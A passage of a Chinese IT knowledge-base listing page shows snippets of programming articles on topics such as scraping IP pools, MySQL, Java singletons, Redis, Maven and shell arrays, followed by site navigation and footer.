href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a> <div>在当今的数据驱动时代，数据抓取成为了获取网络信息的重要手段。然而，频繁的数据抓取活动可能会触发网站的安全机制，导致IP被封禁。为了维持数据抓取的持续性和稳定性，构建一个有效的IP池变得至关重要。本文将详细介绍如何搭建一个用于数据抓取的IP池，以及相关的策略和最佳实践。一、IP池的概念IP池是一个包含多个IP地址的集合，这些IP地址可以是动态的，也可以是静态的，用于在数据抓取过程中轮换使用，以避免因</div> </li> <li><a href="/article/1835142827105939456.htm" title="Python必备库大全，建议留用" target="_blank">Python必备库大全，建议留用</a> <span class="text-muted">2401_84010176</span> <a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>urllib-网络库(stdlib)。requests-网络库。grab–网络库（基于pycurl）。pycurl–网络库（绑定libcurl）。urllib3–PythonHTTP库，安全连接池、支持文件post、可用性高。httplib2–网络库。RoboBrowser–一个简单的、极具Python风格的Python库，无需独立的浏览器即可浏览网页。MechanicalSoup-一个与网站自动</div> </li> <li><a href="/article/1835141314119823360.htm" title="【物联网技术大作业】设计一个智能家居的应用场景" target="_blank">【物联网技术大作业】设计一个智能家居的应用场景</a> <span class="text-muted">Dream_Chaser～</span> <a class="tag" taget="_blank" href="/search/%E6%9C%9F%E6%9C%AB%E5%A4%8D%E4%B9%A0/1.htm">期末复习</a><a class="tag" taget="_blank" href="/search/%E6%99%BA%E8%83%BD%E5%AE%B6%E5%B1%85/1.htm">智能家居</a><a class="tag" taget="_blank" href="/search/%E7%89%A9%E8%81%94%E7%BD%91%E6%8A%80%E6%9C%AF/1.htm">物联网技术</a><a class="tag" taget="_blank" href="/search/%E6%9C%9F%E6%9C%AB%E5%A4%A7%E4%BD%9C%E4%B8%9A/1.htm">期末大作业</a> <div>前言：本人的物联网技术的期末大作业，希望对你有帮助。目录大作业设计题（1）智能家居的概述。（2）介绍智能家居应用。要求至少5个方面的应用，包括每个应用所采用的设备，性能，功能。（3）画出智能家居应用图，并设计使用。大作业设计题设计一个智能家居的应用场景。要求：（1）智能家居的概述。答：智能家居，又称为智能住宅或家庭自动化，是指运用综合布线、网络通信、安全防范、自动控制及音视频等技术，将家居设施集成</div> </li> <li><a href="/article/19.htm" title="解线性方程组" target="_blank">解线性方程组</a> <span class="text-muted">qiuwanchi</span> <div>package gaodai.matrix; import java.util.ArrayList; import java.util.List; import java.util.Scanner; public class Test { public static void main(String[] args) { Scanner scanner = new Sc</div> </li> <li><a href="/article/146.htm" title="在mysql内部存储代码" target="_blank">在mysql内部存储代码</a> <span class="text-muted">annan211</span> <a class="tag" taget="_blank" href="/search/%E6%80%A7%E8%83%BD/1.htm">性能</a><a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B/1.htm">存储过程</a><a class="tag" taget="_blank" href="/search/%E8%A7%A6%E5%8F%91%E5%99%A8/1.htm">触发器</a> <div> 在mysql内部存储代码 在mysql内部存储代码，既有优点也有缺点，而且有人倡导有人反对。 先看优点： 1 她在服务器内部执行，离数据最近，另外在服务器上执行还可以节省带宽和网络延迟。 2 这是一种代码重用。可以方便的统一业务规则，保证某些行为的一致性，所以也可以提供一定的安全性。 3 可以简化代码的维护和版本更新。 4 可以帮助提升安全，比如提供更细</div> </li> <li><a href="/article/273.htm" title="Android使用Asynchronous Http Client完成登录保存cookie的问题" target="_blank">Android使用Asynchronous Http Client完成登录保存cookie的问题</a> <span class="text-muted">hotsunshine</span> <a class="tag" taget="_blank" href="/search/android/1.htm">android</a> <div>Asynchronous Http Client是android中非常好的异步请求工具 除了异步之外还有很多封装比如json的处理，cookie的处理 引用 Persistent Cookie Storage with PersistentCookieStore This library also includes a PersistentCookieStore whi</div> </li> <li><a href="/article/400.htm" title="java面试题" target="_blank">java面试题</a> <span class="text-muted">Array_06</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a> <div>java面试题 第一，谈谈final, finally, finalize的区别。 final-修饰符（关键字）如果一个类被声明为final，意味着它不能再派生出新的子类，不能作为父类被继承。因此一个类不能既被声明为 abstract的，又被声明为final的。将变量或方法声明为final，可以保证它们在使用中不被改变。被声明为final的变量必须在声明时给定初值，而在以后的引用中只能</div> </li> <li><a href="/article/527.htm" title="网站加速" target="_blank">网站加速</a> <span class="text-muted">oloz</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%AB%99%E5%8A%A0%E9%80%9F/1.htm">网站加速</a> <div>前序:本人菜鸟，此文研究总结来源于互联网上的资料，大牛请勿喷！本人虚心学习，多指教. 1、减小网页体积的大小，尽量采用div+css模式，尽量避免复杂的页面结构，能简约就简约。 2、采用Gzip对网页进行压缩；    GZIP最早由Jean-loup Gailly和Mark Adler创建，用于UNⅨ系统的文件压缩。我们在Linux中经常会用到后缀为.gz</div> </li> <li><a href="/article/654.htm" title="正确书写单例模式" target="_blank">正确书写单例模式</a> <span class="text-muted">随意而生</span> <a class="tag" taget="_blank" href="/search/java+%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F+%E5%8D%95%E4%BE%8B/1.htm">java 设计模式 单例</a> <div>　　单例模式算是设计模式中最容易理解，也是最容易手写代码的模式了吧。但是其中的坑却不少，所以也常作为面试题来考。本文主要对几种单例写法的整理，并分析其优缺点。很多都是一些老生常谈的问题，但如果你不知道如何创建一个线程安全的单例，不知道什么是双检锁，那这篇文章可能会帮助到你。 　　懒汉式，线程不安全 　　当被问到要实现一个单例模式时，很多人的第一反应是写出如下的代码，包括教科书上也是这样</div> </li> <li><a href="/article/781.htm" title="单例模式" target="_blank">单例模式</a> <span class="text-muted">香水浓</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>懒汉  调用getInstance方法时实例化 public class Singleton { private static Singleton instance; private Singleton() {} public static synchronized Singleton getInstance() { if(null == ins</div> </li> <li><a href="/article/908.htm" title="安装Apache问题：系统找不到指定的文件 No installed service named "Apache2"" target="_blank">安装Apache问题：系统找不到指定的文件 No installed service named "Apache2"</a> <span class="text-muted">AdyZhang</span> <a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a><a class="tag" taget="_blank" href="/search/http+server/1.htm">http server</a> <div>安装Apache问题：系统找不到指定的文件 No installed service named "Apache2" 每次到这一步都很小心防它的端口冲突问题，结果，特意留出来的80端口就是不能用，烦。 解决方法确保几处： 1、停止IIS启动 2、把端口80改成其它 （譬如90，800，，，什么数字都好） 3、防火墙(关掉试试) 在运行处输入 cmd 回车，转到apa</div> </li> <li><a href="/article/1035.htm" title="如何在android 文件选择器中选择多个图片或者视频？" target="_blank">如何在android 文件选择器中选择多个图片或者视频？</a> <span class="text-muted">aijuans</span> <a class="tag" taget="_blank" href="/search/android/1.htm">android</a> <div>我的android app有这样的需求，在进行照片和视频上传的时候，需要一次性的从照片/视频库选择多条进行上传 但是android原生态的sdk中，只能一个一个的进行选择和上传。 我想知道是否有其他的android上传库可以解决这个问题，提供一个多选的功能，可以使checkbox之类的，一次选择多个 处理方法 官方的图片选择器(但是不支持所有版本的androi，只支持API Level </div> </li> <li><a href="/article/1162.htm" title="mysql中查询生日提醒的日期相关的sql" target="_blank">mysql中查询生日提醒的日期相关的sql</a> <span class="text-muted">baalwolf</span> <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a> <div>SELECT sysid,user_name,birthday,listid,userhead_50,CONCAT(YEAR(CURDATE()),DATE_FORMAT(birthday,'-%m-%d')),CURDATE(),  dayofyear( CONCAT(YEAR(CURDATE()),DATE_FORMAT(birthday,'-%m-%d')))-dayofyear(</div> </li> <li><a href="/article/1289.htm" title="MongoDB索引文件破坏后导致查询错误的问题" target="_blank">MongoDB索引文件破坏后导致查询错误的问题</a> <span class="text-muted">BigBird2012</span> <a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a> <div>问题描述： MongoDB在非正常情况下关闭时，可能会导致索引文件破坏，造成数据在更新时没有反映到索引上。 解决方案：   使用脚本，重建MongoDB所有表的索引。 var names = db.getCollectionNames(); for( var i in names ){ var name = names[i]; print(name); </div> </li> <li><a href="/article/1416.htm" title="Javascript Promise" target="_blank">Javascript Promise</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/Promise/1.htm">Promise</a> <div>        Parse JavaScript SDK现在提供了支持大多数异步方法的兼容jquery的Promises模式，那么这意味着什么呢，读完下文你就了解了。 一.认识Promises         “Promises”代表着在javascript程序里下一个伟大的范式，但是理解他们为什么如此伟大不是件简</div> </li> <li><a href="/article/1543.htm" title="[Zookeeper学习笔记九]Zookeeper源代码分析之Zookeeper构造过程" target="_blank">[Zookeeper学习笔记九]Zookeeper源代码分析之Zookeeper构造过程</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/zookeeper/1.htm">zookeeper</a> <div>   Zookeeper重载了几个构造函数，其中构造者可以提供参数最多，可定制性最多的构造函数是     public ZooKeeper(String connectString, int sessionTimeout, Watcher watcher, long sessionId, byte[] sessionPasswd, boolea</div> </li> <li><a href="/article/1670.htm" title="【Java命令三】jstack" target="_blank">【Java命令三】jstack</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/jstack/1.htm">jstack</a> <div>jstack是用于获得当前运行的Java程序所有的线程的运行情况(thread dump），不同于jmap用于获得memory dump   [hadoop@hadoop sbin]$ jstack Usage: jstack [-l] <pid> (to connect to running process) jstack -F </div> </li> <li><a href="/article/1797.htm" title="jboss 5.1启停脚本　动静分离部署" target="_blank">jboss 5.1启停脚本　动静分离部署</a> <span class="text-muted">ronin47</span> <div>以前启动jboss，往各种xml配置文件，现只要运行一句脚本即可。start nohup sh /**/run.sh -c servicename  -b ip -g  clustername   -u broatcast jboss.messaging.ServerPeerID=int  -Djboss.service.binding.set=p</div> </li> <li><a href="/article/1924.htm" title="UI之如何打磨设计能力?" target="_blank">UI之如何打磨设计能力?</a> <span class="text-muted">brotherlamp</span> <a class="tag" taget="_blank" href="/search/UI/1.htm">UI</a><a class="tag" taget="_blank" href="/search/ui%E6%95%99%E7%A8%8B/1.htm">ui教程</a><a class="tag" taget="_blank" href="/search/ui%E8%87%AA%E5%AD%A6/1.htm">ui自学</a><a class="tag" taget="_blank" href="/search/ui%E8%B5%84%E6%96%99/1.htm">ui资料</a><a class="tag" taget="_blank" href="/search/ui%E8%A7%86%E9%A2%91/1.htm">ui视频</a> <div>  在越来越拥挤的初创企业世界里，视觉设计的重要性往往可以与杀手级用户体验比肩。在许多情况下，尤其对于 Web 初创企业而言，这两者都是不可或缺的。前不久我们在《右脑革命：别学编程了，学艺术吧》中也曾发出过重视设计的呼吁。如何才能提高初创企业的设计能力呢?以下是 9 位创始人的体会。 1.找到自己的方式 如果你是设计师，要想提高技能可以去设计博客和展示好设计的网站如D-lists或</div> </li> <li><a href="/article/2051.htm" title="三色旗算法" target="_blank">三色旗算法</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a> <div> import java.util.Arrays; /** 问题： 假设有一条绳子，上面有红、白、蓝三种颜色的旗子，起初绳子上的旗子颜色并没有顺序， 您希望将之分类，并排列为蓝、白、红的顺序，要如何移动次数才会最少，注意您只能在绳 子上进行这个动作，而且一次只能调换两个旗子。 网上的解法大多类似： 在一条绳子上移动，在程式中也就意味只能使用一个阵列，而不使用其它的阵列来</div> </li> <li><a href="/article/2178.htm" title="警告:No configuration found for the specified action: \'s" target="_blank">警告:No configuration found for the specified action: \'s</a> <span class="text-muted">chiangfai</span> <a class="tag" taget="_blank" href="/search/configuration/1.htm">configuration</a> <div>1.index.jsp页面form标签未指定namespace属性。 <!--index.jsp代码--> <%@taglib prefix="s" uri="/struts-tags"%> ... <s:form action="submit" method="post"&g</div> </li> <li><a href="/article/2305.htm" title="redis -- hash_max_zipmap_entries设置过大有问题" target="_blank">redis -- hash_max_zipmap_entries设置过大有问题</a> <span class="text-muted">chenchao051</span> <a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a><a class="tag" taget="_blank" href="/search/hash/1.htm">hash</a> <div>使用redis时为了使用hash追求更高的内存使用率，我们一般都用hash结构，并且有时候会把hash_max_zipmap_entries这个值设置的很大，很多资料也推荐设置到1000，默认设置为了512，但是这里有个坑   #define ZIPMAP_BIGLEN 254 #define ZIPMAP_END 255     /* Return th</div> </li> <li><a href="/article/2432.htm" title="select into outfile access deny问题" target="_blank">select into outfile access deny问题</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/txt/1.htm">txt</a><a class="tag" taget="_blank" href="/search/%E5%AF%BC%E5%87%BA%E6%95%B0%E6%8D%AE%E5%88%B0%E6%96%87%E4%BB%B6/1.htm">导出数据到文件</a> <div>本文转自：http://hatemysql.com/2010/06/29/select-into-outfile-access-deny%E9%97%AE%E9%A2%98/ 为应用建立了rnd的帐号，专门为他们查询线上数据库用的，当然，只有他们上了生产网络以后才能连上数据库，安全方面我们还是很注意的，呵呵。 授权的语句如下： grant select on armory.* to rn</div> </li> <li><a href="/article/2559.htm" title="phpexcel导出excel表简单入门示例" target="_blank">phpexcel导出excel表简单入门示例</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/Excel/1.htm">Excel</a><a class="tag" taget="_blank" href="/search/phpexcel/1.htm">phpexcel</a> <div> <?php error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE);   if (PHP_SAPI == 'cli') die('This example should only be run from a Web Brows</div> </li> <li><a href="/article/2686.htm" title="美国电影超短200句" target="_blank">美国电影超短200句</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/%E7%94%B5%E5%BD%B1/1.htm">电影</a> <div>1. I see． 我明白了。2. I quit! 我不干了!3. Let go! 放手!4. Me too． 我也是。5. My god! 天哪!6. No way! 不行!7. Come on． 来吧(赶快)8. Hold on． 等一等。9. I agree。 我同意。10. Not bad． 还不错。11. Not yet． 还没。12. See you． 再见。13. Shut up! </div> </li> <li><a href="/article/2813.htm" title="Java访问远程服务" target="_blank">Java访问远程服务</a> <span class="text-muted">dyy_gusi</span> <a class="tag" taget="_blank" href="/search/httpclient/1.htm">httpclient</a><a class="tag" taget="_blank" href="/search/webservice/1.htm">webservice</a><a class="tag" taget="_blank" href="/search/get/1.htm">get</a><a class="tag" taget="_blank" href="/search/post/1.htm">post</a> <div>    随着webService的崛起，我们开始中会越来越多的使用到访问远程webService服务。当然对于不同的webService框架一般都有自己的client包供使用，但是如果使用webService框架自己的client包，那么必然需要在自己的代码中引入它的包，如果同时调运了多个不同框架的webService，那么就需要同时引入多个不同的clien</div> </li> <li><a href="/article/2940.htm" title="Maven的settings.xml配置" target="_blank">Maven的settings.xml配置</a> <span class="text-muted">geeksun</span> <a class="tag" taget="_blank" href="/search/settings.xml/1.htm">settings.xml</a> <div>settings.xml是Maven的配置文件，下面解释一下其中的配置含义： settings.xml存在于两个地方： 1.安装的地方：$M2_HOME/conf/settings.xml 2.用户的目录：${user.home}/.m2/settings.xml 前者又被叫做全局配置，后者被称为用户配置。如果两者都存在，它们的内容将被合并，并且用户范围的settings.xml优先。 </div> </li> <li><a href="/article/3067.htm" title="ubuntu的init与系统服务设置" target="_blank">ubuntu的init与系统服务设置</a> <span class="text-muted">hongtoushizi</span> <a class="tag" taget="_blank" href="/search/ubuntu/1.htm">ubuntu</a> <div>转载自：  http://iysm.net/?p=178 init Init是位于/sbin/init的一个程序，它是在linux下，在系统启动过程中，初始化所有的设备驱动程序和数据结构等之后，由内核启动的一个用户级程序，并由此init程序进而完成系统的启动过程。 ubuntu与传统的linux略有不同，使用upstart完成系统的启动，但表面上仍维持init程序的形式。 运行</div> </li> <li><a href="/article/3194.htm" title="跟我学Nginx+Lua开发目录贴" target="_blank">跟我学Nginx+Lua开发目录贴</a> <span class="text-muted">jinnianshilongnian</span> <a class="tag" taget="_blank" href="/search/nginx/1.htm">nginx</a><a class="tag" taget="_blank" href="/search/lua/1.htm">lua</a> <div>使用Nginx+Lua开发近一年的时间，学习和实践了一些Nginx+Lua开发的架构，为了让更多人使用Nginx+Lua架构开发，利用春节期间总结了一份基本的学习教程，希望对大家有用。也欢迎谈探讨学习一些经验。    目录 第一章 安装Nginx+Lua开发环境 第二章 Nginx+Lua开发入门 第三章 Redis/SSDB+Twemproxy安装与使用 第四章 L</div> </li> <li><a href="/article/3321.htm" title="php位运算符注意事项" target="_blank">php位运算符注意事项</a> <span class="text-muted">home198979</span> <a class="tag" taget="_blank" href="/search/%E4%BD%8D%E8%BF%90%E7%AE%97/1.htm">位运算</a><a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/%26/1.htm">&</a> <div>$a = $b = $c = 0; $a & $b = 1; $b | $c = 1  问a,b,c最终为多少?   当看到这题时，我犯了一个低级错误，误 以为位运算符会改变变量的值。所以得出结果是1 1 0 但是位运算符是不会改变变量的值的，例如： $a=1;$b=2; $a&$b;  这样a,b的值不会有任何改变 </div> </li> <li><a href="/article/3448.htm" title="Linux shell数组建立和使用技巧" target="_blank">Linux shell数组建立和使用技巧</a> <span class="text-muted">pda158</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a> <div>1.数组定义 　　[chengmo@centos5 ~]$ a=(1 2 3 4 5) 　　[chengmo@centos5 ~]$ echo $a 　　1 　　一对括号表示是数组，数组元素用“空格”符号分割开。 　　 2.数组读取与赋值 　　得到长度： 　　[chengmo@centos5 ~]$ echo ${#a[@]} 　　5 　　用${#数组名[@或</div> </li> <li><a href="/article/3575.htm" title="hotspot源码(JDK7)" target="_blank">hotspot源码(JDK7)</a> <span class="text-muted">ol_beta</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/HotSpot/1.htm">HotSpot</a><a class="tag" taget="_blank" href="/search/jvm/1.htm">jvm</a> <div>源码结构图，方便理解：   ├─agent                            Serviceab</div> </li> <li><a href="/article/3702.htm" title="Oracle基本事务和ForAll执行批量DML练习" target="_blank">Oracle基本事务和ForAll执行批量DML练习</a> <span class="text-muted">vipbooks</span> <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a> <div>基本事务的使用： 从账户一的余额中转100到账户二的余额中去，如果账户二不存在或账户一中的余额不足100则整笔交易回滚 select * from account; -- 创建一张账户表 create table account( -- 账户ID id number(3) not null, -- 账户名称 nam</div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类：</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved. <!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>--> </div> </div> </footer> <!-- 代码高亮 --> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>